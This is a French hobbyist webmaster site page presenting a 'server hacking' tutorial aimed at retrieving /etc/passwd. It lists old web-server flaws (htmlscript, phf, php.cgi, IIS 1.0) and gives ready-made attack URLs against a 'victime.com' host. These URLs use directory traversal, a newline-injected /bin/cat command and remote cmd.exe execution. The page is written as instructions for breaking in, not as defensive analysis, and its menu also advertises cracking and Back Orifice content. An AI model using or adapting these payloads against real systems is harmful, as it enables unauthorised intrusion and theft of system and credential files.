Bienvenue sur horslimite.net
Ce site vous propose tutoriels de programmations (php javascript ...) forum compteur de connectés, compteur de visites, script php, téléchargement de logiciel, Blog etc...
 
aide webmastering webmaster compteur forum Menu
home
  • News
  • Recherche
  • Téléchargement
  • Statistiques
    • Tutoriels      
  • PHP     
  • JavaScript     
  • Crack
  • Linux     
  • Back orifice
  • Faille include (php)
    • Membre      
  • Inscription
  • Liste des membres
  • Votre profil
  • Compteur de visites
  • Compteur de connectés
  • Votre carte membre
  • Messagerie interne
  • Blog
    • Service      
  • Whois
  • Header d\\\\'une page
  • Obtenir une IP
  • Générateur de méta-tags
    • Forum


    Votez pour ce site au Weborama
    > tutoriel > hack de server


    Vous trouverez ici quelques techniques qui vous permettre de hacker un serveur WEB De maniere generale elles consistent a recuperer le fichier /etc/passwd


  • HTTP -

    • htmlscript
    SERVICE : http
    BUG :
    Htmlscript (http://www.htmlscript.com/) vous autorise l'acces aux fichiers systemes du serveur.

    IMPACT :
    Les utilisateurs sans droits peuvent via leur navigateur lire n'importe quel fichier systeme du serveur.

    EXEMPLE :
    Il suffit de taper:
    http://www.victime.com/cgi-bin/htmlscript?../../../../../etc/passwd
    Le nombre de repertoires est lie bien sur a l'emplacement du fichier " passwd " ou du fichier que vous voulez lire et aussi de l'emplacement du repertoire " CGI-BIN " .



  • HTTP - phf
    SERVICE : http

    BUG :
    Le script phfdistribue avec le serveur http NCSA, version NCSA/1.5a et anterieures ainsi que le serveur Apache anterieure a la version 1.0.5 ne filtrent pas certaines requettes

    IMPACT :
    Via le WEB les utilisateurs peuvent executer certaines commandes par l'intermediaire du daemon http

    HISTORIQUE :
    Le bug a été decouvert le 12 mars 1996
    Une liste de serveurs est disponible par l'intermediaire de commandes speciales de ALTA VISTA

    EXEMPLE :
    http://victime.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
    Cet exemple vous permet de recuperer le fichier /etc/passwd a partir d'un serveur vulnerable.



  • HTTP - php.cgi
    SERVICE : http

    BUG :
    Voici un bug identique a celui de phf decrit ci dessus

    EXEMPLE :
    http://victime.com/cgi-bin/php.cgi?/etc/passwd
    Vous permet de recuperer comme le phf le fichier /etc/passwd



  • HTTP -
    Microsoft IIS/1.0 pre service pack 3
    SERVICE : http

    PROGRAMME :
    Microsoft internet-Server/1.0 anterieure au pack 3

    BUG :
    Le serveur autorise certaines commandes en dehors du chemin initial

    IMPACT :
    Les utilisateurs peuvent prendre le control du serveur


    DESCRIPTION :
    Il est possible de récupérer des fichiers et d'éxécuter des commandes en dehors du chemin " www " en ajoutant " .. " dans le chemin d'accès.
    Dans les exemples suivants le chemin d'acces envisage de IIS est c:\inetsrv et pour Windows NT c:\winn35


    http://your.host.name/scripts/anyold.cmd?&dir+c:\
    http://your.host.name/scripts/anyold.bat?&dir+c:\
    http://your.host.name/..\..\autoexec.bat
    http://your.host.name/scripts/../../../winnt35/win.ini
    http://your.host.name/scripts/..\..\winnt35\cmd.exe?%2FC+set
    http://your.host.name/scripts/..\..\winnt35\cmd.exe?%2FC+echo+"Hi There"+>c:\temp\hello.txt
    http://your.host.name/scripts/..\..\WINNT35\SYSTEM32\XCOPY.EXE?+c:\autoexec.bat+c:\temp

    jamac
    		•  
    page générée en 72 millisecondes